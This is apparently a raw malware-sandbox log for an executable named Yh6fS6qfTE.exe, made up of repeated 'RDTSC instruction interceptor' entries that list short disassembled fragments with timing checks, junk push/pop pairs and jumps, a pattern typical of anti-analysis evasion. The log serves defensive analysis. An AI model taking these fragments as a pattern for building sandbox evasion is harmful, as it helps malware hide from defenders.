Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11566D9 second address: 11566DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11566DD second address: 11566EF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FD09CF151BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115AF7C second address: 115AF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115B54D second address: 115B553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115B80F second address: 115B813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115B813 second address: 115B817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115BD78 second address: 115BD95 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD09CB0C7E6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007FD09CB0C7E6h 0x00000013 jbe 00007FD09CB0C7E6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115BD95 second address: 115BDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FD09CF151BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115BDA2 second address: 115BDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD09CB0C7F3h 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FD09CB0C7E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115BDC3 second address: 115BDCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115BDCD second address: 115BDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115BF27 second address: 115BF59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007FD09CF151BCh 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FD09CF151C5h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115C0BD second address: 115C0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1161455 second address: 116145B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116145B second address: 1161492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD09CB0C7E6h 0x0000000a popad 0x0000000b push esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop esi 0x0000000f jmp 00007FD09CB0C7ECh 0x00000014 popad 0x00000015 je 00007FD09CB0C82Ah 0x0000001b pushad 0x0000001c jmp 00007FD09CB0C7F2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1161E79 second address: 1161E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1161E7D second address: 1161E83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1161E83 second address: 1161E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1161FD6 second address: 1161FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1161FF2 second address: 1161FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116215D second address: 1162162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1166C02 second address: 1166C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FD09CF151BAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1166C13 second address: 1166C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1166C19 second address: 1166C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1166C25 second address: 1166C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1166C2B second address: 1166C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1166D84 second address: 1166DBD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 jnc 00007FD09CB0C7FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 js 00007FD09CB0C7E6h 0x00000018 pop edi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11672DB second address: 11672E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11672E1 second address: 11672E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1167868 second address: 116786C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11679BE second address: 11679C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD09CB0C7E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 110FBF8 second address: 110FC02 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CF151B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 110FC02 second address: 110FC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1167E0A second address: 1167E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1167E0E second address: 1167E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1166758 second address: 116675D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116675D second address: 1166769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1166769 second address: 116676F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116676F second address: 1166774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1166774 second address: 116677B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116C9D5 second address: 116C9E1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116C9E1 second address: 116C9F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116C9F6 second address: 116CA1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FD09CB0C7E6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116B94B second address: 116B957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116B957 second address: 116B966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007FD09CB0C7ECh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 112FD68 second address: 110F08C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FD09CF151C8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 xor dword ptr [ebp+122D244Dh], edx 0x00000016 call dword ptr [ebp+122D29B7h] 0x0000001c pushad 0x0000001d ja 00007FD09CF151C7h 0x00000023 jp 00007FD09CF151B8h 0x00000029 popad 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11303D2 second address: 1130413 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD09CB0C7E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FD09CB0C7ECh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007FD09CB0C7F5h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jo 00007FD09CB0C7F0h 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113057B second address: 1130585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD09CF151B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116BD84 second address: 116BD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116BD88 second address: 116BD97 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD09CF151DCh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116BD97 second address: 116BD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116BEDC second address: 116BEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116C1AB second address: 116C1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116C453 second address: 116C469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 116C469 second address: 116C46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1171616 second address: 117162F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD09CF151BDh 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10DD209 second address: 10DD20F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10DD20F second address: 10DD21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jc 00007FD09CF151B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117507C second address: 1175082 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11775ED second address: 11775F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10DB595 second address: 10DB5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10DB5A1 second address: 10DB5A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1177185 second address: 11771AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7ECh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD09CB0C7F1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11771AC second address: 11771B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11771B0 second address: 11771C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FD09CB0C7E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1179EFF second address: 1179F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1179F05 second address: 1179F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD09CB0C7F4h 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FD09CB0C7EBh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117A31F second address: 117A336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FD09CF151B6h 0x0000000c popad 0x0000000d jng 00007FD09CF151BEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118014B second address: 1180160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jl 00007FD09CB0C7E8h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1180160 second address: 1180164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F1692 second address: 10F16A6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD09CB0C7EAh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F16A6 second address: 10F16AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F4D3 second address: 117F4D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F4D9 second address: 117F504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C8h 0x00000009 jmp 00007FD09CF151BFh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F504 second address: 117F50E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F50E second address: 117F514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F677 second address: 117F67B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F7E8 second address: 117F820 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD09CF151B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD09CF151C4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD09CF151C1h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F820 second address: 117F826 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F826 second address: 117F82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F82C second address: 117F832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F832 second address: 117F836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117F836 second address: 117F83A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCC3 second address: 117FCCD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD09CF151B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCCD second address: 117FCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCD6 second address: 117FCED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007FD09CF151B6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FD09CF151B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCED second address: 117FCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 117FCF1 second address: 117FD02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185BEF second address: 1185BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185BF5 second address: 1185BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1184A8D second address: 1184AB6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7EAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD09CB0C7F9h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1184AB6 second address: 1184ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1184D7C second address: 1184D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1184D94 second address: 1184DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C1h 0x00000009 pop edi 0x0000000a rdtsc
